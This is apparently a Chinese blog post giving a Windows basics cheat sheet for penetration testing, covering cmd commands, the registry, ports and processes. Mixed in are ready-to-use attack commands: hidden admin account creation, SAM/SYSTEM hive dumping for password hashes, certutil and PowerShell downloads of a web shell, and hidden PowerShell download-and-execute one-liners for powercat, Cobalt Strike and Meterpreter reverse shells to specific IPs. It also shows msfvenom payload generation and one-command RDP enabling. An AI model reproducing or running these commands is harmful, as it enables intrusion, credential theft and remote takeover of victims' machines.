• Windows基础


    目录

    Windows发展历史

    Windows中常见的目录

    Windows常见的cmd命令

    Windows中cmd窗口的文件下载(bitsadmin和certutil)

    Windows中的Powershell命令 

    Windows中的批处理文件

    Windows中快捷键操作

    Windows中运行窗口的命令

    Windows中的注册表

    Windows中的端口

    Windows中的进程

    监听端口netstat

    Windows反弹Shell 

    一键开启3389远程桌面

    Windows应急响应


    Windows发展历史

    Microsoft Windows,是美国微软公司研发的一套操作系统,它问世于1985年,起初仅仅是DOS模拟环境,后续的系统版本由于微软不断的更新升级,不但易用,也慢慢的成为家家户户人们最喜爱的操作系统。

    MS-Dos

    版本号 发布时间
    Windows1.0 1985.11
    Windows2.0 1987.12
    Windows2.1 1988
    Windows3.0 1990.5
    Windows3.1 1992
    Windows3.2 1994

    WIN 9X

    版本号 发布时间
    Windows95 1995.8(拥有开始按钮和菜单栏)
    Windows98 1998.6(真正意义上的图形化界面系统)
    Windows98SE 1999
    WindowsME 2000.9

    WIN NT

    版本号 发布时间
    WindowsNT3.1 1993
    WindowsNT4.0 1996.4
    Windows 2000 (NT5.0) 2000
    Windows XP (NT5.1) 2001.10   2009.4停止更新
    Window Vista (NT6.0) 2007.1    2011.7停止更新  2017年4月停止所有支持
    Windows 7 (NT6.1) 2009.7   2020.1停止所有支持
    Windows 8 (NT6.3) 2012.10
    Windows 8.1 2013.10
    Windows 10 (NT10.0) 2015.7

    Windows Server

    版本号 发布时间
    Windows Server 2003 2003.3         2015.7停止更新
    Windows Server 2008 2008.2
    Windows Server 2012 2012.9
    Windows Server 2016 2016.10

    Windows中常见的目录

    C:UsersxieAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup    这个目录下存放着这个用户开机启动的程序
    C:programDataMicrosoftWinodwsStart MenuProgramsStartUp    这个目录下存放这开机自启的程序
    C:Windows                                 这个目录是系统的安装目录
    C:WindowsSystem32                        这个目录下存放着系统的配置文件
    C:WindowsSystem32configSAM             这个目录下的SAM文件存放着用户的登录账户和密码,要清楚账户和密码,需要进PE系统把这个文件删掉,对应系统进程: lsass.exe
    C:PerfLogs                                这个是系统日志目录

    Windows常见的cmd命令

    #系统信息
    systeminfo                           查看系统信息
    hostname                             查看主机名
    SET                                  查看环境变量
    color                                改变cmd颜色
    cls                                  清除屏幕
    
    #网络
    ping -t  -l  65500  ip               死亡之ping
    ipconfig    /release                 释放ip
    ipconfig    /renew                   重新获得ip
    ipconfig    /flushdns                刷新DNS缓存
    route print                          打印路由信息
    arp -a                               查看arp缓存
    net view                             查看局域网内其他计算机名称
    netsh firewall show state            防火墙状态
    netsh firewall show config           防火墙规则
    
    
    #用户
    whoami                                查看系统当前用户
    net user                              查看有哪些用户
    net user xie                          查看用户xie的信息
    net localgroup                        查看组
    net localgroup administrators         查看组administrators的信息
    net user  hack   123  /add            新建一个用户hack,密码为123
    net user  hack$  123  /add            新建一个隐藏hack用户,密码为123
    net user  hack   /del                 删除用户hack
    net localgroup  administrators  hack  /add   将普通用户hack提权到管理员
    net user  guest  /active:yes          激活guest用户
    net user  guest  /active:no           关闭guest用户
    net password   密码                   更改系统当前登录用户密码
    net user guest 密码                   更改guest用户密码
    
    
    #端口进程服务
    tasklist                             查看进程
    tasklist  /svc                       查看进程,显示进程使用者名称
    netstat  -ano                        查看系统开放端口
    netstat  -ano|findstr 80             查看80端口对应的PID
    tasklist | findstr 80                查看80端口对应的进程
    taskkill /f /t /im xx.exe            杀死xx.exe进程
    taskkill /F -pid 520                 杀死pid为520的进程
    net start                            查看开启了哪些服务
    net start telnet                     开启telnet服务
    net stop  telnet                     停止 telnet服务
    start   www.baidu.com                打开网址
    
    #共享
    net use                               查看连接
    net share                             查看本地开启的共享
    net share ipc$                        开启ipc$共享
    net share ipc$ /del                   删除ipc$共享
    net share c$ /del                     删除C盘共享
    
    net use \192.168.10.15ipc$ /u:"" ""     与192.168.10.15建立ipc空连接
    net use \192.168.10.15      /u:"" ""     与192.168.10.15建立ipc空连接,可以吧ipc$去掉
    net use \192.168.10.15 /u:"administrator" "root"   以administrator身份与192.168.10.15建立ipc连接
    net use \192.168.10.15 /del              删除ipc连接
    
    net use \192.168.10.15c$  /u:"administrator" "root"    建立C盘共享
    dir \192.168.10.15c$                  查看192.168.10.15C盘文件
    dir \192.168.10.15c$user             查看192.168.10.15C盘文件下的user目录
    dir \192.168.10.15c$user	est.exe    查看192.168.10.15C盘文件下的user目录下的test.exe文件
    net use \192.168.10.15c$  /del        删除该C盘共享连接
    
    net use k: \192.168.10.15c$  /u:"administrator" "root"    将目标C盘映射到本地K盘
    net use k: /del                                             删除该映射
       
    #文件操作 
    echo  hello,word > 1.txt              向1.txt中写入 hello,word
    echo  hello,word >>1.txt              向1.txt中追加 hello,word
    del                                   删除一个文件
    deltree                               删除文件夹和它下面的所有子文件夹还有文件
    ren 1.txt  2.txt                      将 1.txt 重命名为 2.txt
    type  1.txt                           查看1.txt文件的内容
    md                                    创建一个文件夹
    rd                                    删除一个文件夹
    move  1.txt  d:/                      将1.txt文件移动到d盘下
    type  123.txt                         打开123.txt文件
    dir c:                               查看C盘下的文件
    dir c: /A                            查看C盘下的所有文件,包括隐藏文件
    dir c: /S                            查看C盘下和其子文件夹下的文件
    dir c: /B                            只显示C盘下的文件名
    
    shutdown -s -t 60 -c  “你的电脑被黑了”         -s关机 -r重启 -a取消
    copy con A.txt   创建A.txt文本文件; 
      hello,word      输入内容; 
        按CTRL+Z键,之后再回车;
    
    
     
    reg save  hklmsam  sam.hive
    reg save  hklmsystem  system.hive
    这两个文件是windows的用户账户数据库,所有用户的登录名以及口令等相关信息都会保存在文件中,这两条命令是获取windows管理员的hash值

    Windows中cmd窗口的文件下载(bitsadmin和certutil)

    无论是bitsadmin还是certutil,都要将下载的文件放到拥有权限的目录,否则会提示权限拒绝

    certutil

    certutil也是windows下一款下载文件的工具,自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说,一下命令是在Win7及其以后的机器使用。

    certutil -urlcache -split -f http://114.118.80.138/shell.php  #下载文件到当前目录下
    
    certutil -urlcache -split -f http://114.118.80.138/shell.php  c:/users/xie/desktop/shell.php        #下载文件到指定目录下

    bitsadmin

    bitsadmin  可以用来在windows 命令行下下载文件。bitsadmin是windows 后台智能传输服务的一个工具,windows 的自动更新,补丁之类的下载就是用这个工具来实现的。Windows Server2003和XP是没有bitsadmin的,Winc7及其之后的机器才有。

    bitsadmin的一些特性:

    • bitsadmin 可以在网络不稳定的状态下下载文件,出错会自动重试,可靠性应该相当不错。
    • bitsadmin 可以跟随URL跳转.
    • bitsadmin 不像curl  wget 这类工具那样能用来下载HTML页面。

    用法:

    bitsadmin /transfer test http://files.cnblogs.com/files/gayhub/bcn.js  c:usersxiedesktopshell.php
    # "任务名" 可以随意起,保存文件的文件路径必须是已经存在的目录,否则不能下载。

    下载完成后

    默认情况下bitsadmin下载速度极慢,下载较大文件需要设置优先级提速,以下是用法示例

    start bitsadmin /transfer test http://192.168.10.14/test.exe  f:	est.exe
    bitsadmin /setpriority test foreground     #设置任务test为最高优先级

    相关文章:使用bitsadmin.exe 下载文件,配合bcn.bat玩出更多的花样

    Windows中的Powershell命令 

    Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。

    Windows XP 和 Windows Server 2003是没有Powershell的,Win7、2008 Server 及其以后的有。

    #在cmd窗口下执行,将远程主机上的test.exe 下载到本地的桌面上
    powershell "$c=new-Object "System.Net.WebClient";$c.DownloadFile("http://192.168.10.11/test.exe","C:/Users/Administrator/Desktop/test.exe");";

    Windows中的批处理文件

    @echo off            表示在此语句后所有运行的命令都不显示命令行本身
    echo                 显示这行后面的文字
    title                标题 
    rem                  注释命令
    cls                  清楚窗口
    set /a               赋值
    set /p  name=        接受用户输入,保存在name中
    %name%               输出用户的输入
    if   else            判断
    GEQ                  大于等于
    LSS                  小于
    goto   :1 :2         跳转到
    exit                 退出程序
    start                启动文件
    call                 调用另一个批处理文件
    dir c:*.*>a.txt     将C盘文件列表写入a.txt
    del                  删除一个或多个文件

    Windows中快捷键操作

    Alt+Tab               快速切换程序
    Alt+F4                快速关闭程序
    Alt                   矩形选择
    Alt+双击文件           查看文件属性
    Shift+delete          永久删除文件
    Ctrl+。               中英文标点切换
    Ctrl+S                保存
    Ctrl+N                新建
    Ctrl+W                关闭程序
    Ctrl+U                加下划线
    Ctrl+Z                撤销操作
    Ctrl+B                粗体
    Ctrl+I                斜体
    Ctrl+shift+esc        快速打开任务管理器
    Win+D                 快速回到桌面
    Win+I                 快速打开设置
    Win+A                 打开操作中心
    Win+Q                 打开语音助手cortana
    Win+X                 打开windows功能
    Win+Pause             我的电脑的属性
    

    Windows中运行窗口的命令

    dxdiag                查询电脑硬件配置信息
    control               控制面板
    services.msc          服务
    msconfig              系统配置
    regedit               注册表
    ncpa.cpl              网络连接
    firewall.cpl          防火墙
    devmgmt.msc           设备管理器 
    diskmgmt.msc          磁盘管理实用
    compmgmt.msc          计算机管理
    winver                检查Windows版本  
    write                 写字板
    mspaint               画图板
    mstsc                 远程桌面连接 
    magnify               放大镜实用程序 
    notepad               打开记事本
    shrpubw               创建共享文件夹 
    calc                  启动计算器 
    osk                   打开屏幕键盘

    Windows中的注册表

    注册表(Registry,繁体中文版Windows称之为登录)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的配置信息

    • HKEY_CLASSES_ROOT    管理文件系统,根据windows中安装的应用程序的扩展名,该根键指明其文件类型的名称,相应打开文件所要调用的程序等等信息。
    • HEKY_CURRENT_USER   管理系统当前的用户信息。在这个根键中保存了本地计算机存放的当前登录的用户信息,包括用户登录用户名和暂存的密码。
    • HKEY_LOCAL_MACHINE   管理当前系统硬件配置。在这个根键中保存了本地计算机硬件配置数据,此根键下的子关键字包括在SYSTEM.DAT中,用来提供HKEY_LOCAL_MACHINE所需的信息,或者在远程计算机中可访问的一组键中
    • HKEY_USERS   管理系统的用户信息,在这个根键中保存了存放在本地计算机口令列表中的用户标识和密码列表。同时每个用户的预配置信息都存储在HKEY_USERS根键中。HKEY_USERS是远程计算机中访问的根键之一。
    • HKEY_CURRENT_CONFIG   管理当前用户的系统配置。在这个根键中保存着定义当前用户桌面配置的数据,该用户使用过的文档列表。

    Windows中的端口

    • 公认端口:公认端口也称为常用端口,包括 0-1023 端口
    • 注册端口:注册端口包括 1024-49151 端口,它们松散地绑定一些服务
    • 动态/私有端口:动态/私有端口包括 49152-65535,这些端口通常不会被分配服务。

    关闭端口:

    命令行方式关闭端口,实际上是调用了防火墙。以管理员权限打开cmd窗口,执行下面命令,以下是演示关闭139端口

    netsh advfirewall set allprofile state on
    netsh advfirewall firewall add rule name=test dir=in action=block protocol=TCP localport=139   #想关闭其他端口,把139替换成其他端口就行

    也可以直接在防火墙图形化界面关闭:

    然后一直下一步就可以了

    Windows中的进程

    windows中包括系统进程和程序进程。

    ctrl+shift+esc 打开任务管理器,可以查看进程信息。用户名为SYSTEM的是系统进程。

    一些常见的系统进程和含义:

    • conime.exe:与输入法编辑器有关的系统进程,能够确保正常调整和编辑系统中的输入法
    • csrss.exe:该进程是微软客户端/服务端运行时子系统,该进行管理windows图形相关任务
    • ctfmon.exe:该进程与输入法有关,该进程的正常运行能够确保语言栏能正常显示在任务栏中
    • explorer.exe:该进程是windows资源管理器,可以说是windows图形界面外壳程序,该进程的正常运行能够确保在桌面上显示桌面图标和任务栏
    • lsass.exe:该进行用于windows操作系统的安全机制、本地安全和登录策略
    • services.exe:该进程用于启动和停止系统中的服务,如果用户手动终止该进程,系统也会重新启动该进程
    • smss.exe:该进程用于调用对话管理子系统,负责用户与操作系统的对话
    • svchost.exe:该进行是从动态链接库(DLL)中运行的服务的通用主机进程名称,如果用户手动终止该进程,系统也会重新启动该进程
    • system:该进程是windows页面内存管理进程,它能够确保系统的正常启动
    • system idle process:该进行的功能是在CPU空闲时发出一个命令,使CPU挂起,从而有效降低CPU内核的温度
    • winlogon.exe:该进程是Windows NT用户登录程序,主要用于管理用户登录和退出。

    监听端口netstat

    windows中使用 netstat 命令用来监听端口

    • 显示所有的有效连接信息列表,包括监听连接请求(LISTENING )的连接、已建立的连接(ESTABLISHED )、断开连接(CLOSE_WAIT )或者处于联机等待状态的(TIME_WAIT )等 :netstat -a
    • 以数字形式显示地址和端口号:netstst -an
    • 除了显示这些信息外,还显示进程的PID:netstat -ano
    • 查看被占用端口80对应的应用的PID:netstat -ano | findstr 80
    • 查看80端口被哪个进程或程序占用:tasklist | findstr 80
    • 结束该进程或程序:taskkill  /f  /t  /im  xx.exe        /f 杀死所有进程及   /t 强制杀死    /im 用镜像名称作为进程信息    
    • 杀死指定PID的进程:taskkill  -F -pid 520        杀死PID为520的进程
                       

    Windows反弹Shell 

    cmd窗口下利用Powershell反弹NC shell 

    亲测所有机器都适用

    powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd
    
    powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11  -p 8888 -e cmd.exe"

    cmd窗口下利用Powershell反弹CobaltStrike shell

    windows10 经常性不能用。windows 2008R2以下百分百适用。

    powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://114.118.80.138:8080/a'))"   #后台运行
     
    powershell.exe  -c "IEX ((new-object net.webclient).downloadstring('http://114.118.80.138:8080/a'))"   

    cmd窗口下反弹MSF shell

    VPS上的操作

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=114.128.90.138 lport=7788 -f psh-reflection >7788.ps1        #生成木马文件 7788.ps1
    
    python -m SimpleHTTPServer 80  #开启web服务
    
    #MSF监听
    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 114.118.80.138
    set lport 7788
    exploit -j

    目标机的操作

    powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://114.118.80.138/7788.ps1');xx.ps1"  #后台运行
    
    或者
    
    powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://114.118.80.138/7788.ps1');xx.ps1"

    一键开启3389远程桌面

    以下命令需要administrator权限运行,XP / 2003 / Win7 / Win2008  R2 Server 亲测可用 

    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    
    C:WindowsSystem32wbemwmic /namespace:\rootcimv2	erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1

    Windows应急响应

    Windows应急响应

    分享一次应急响应简述

    RDP登录日志取证和清除

    相关文章:Windows内网渗透提权的几个实用命令

                      windows提权辅助页面

  • 相关阅读:
    test20190805 夏令营NOIP训练20
    test20190803 夏令营NOIP训练19
    test20190802 夏令营NOIP训练18
    「SDOI2016」征途
    LG4195 【模板】exBSGS
    test20190731 夏令营NOIP训练16
    CF600E Lomsat gelral 和 CF741D Dokhtar-kosh paths
    CF623E Transforming Sequence
    LG4351 [CERC2015]Frightful Formula
    CF553E Kyoya and Train
  • 原文地址:https://www.cnblogs.com/csnd/p/11807589.html
Copyright © 2020-2023  润新知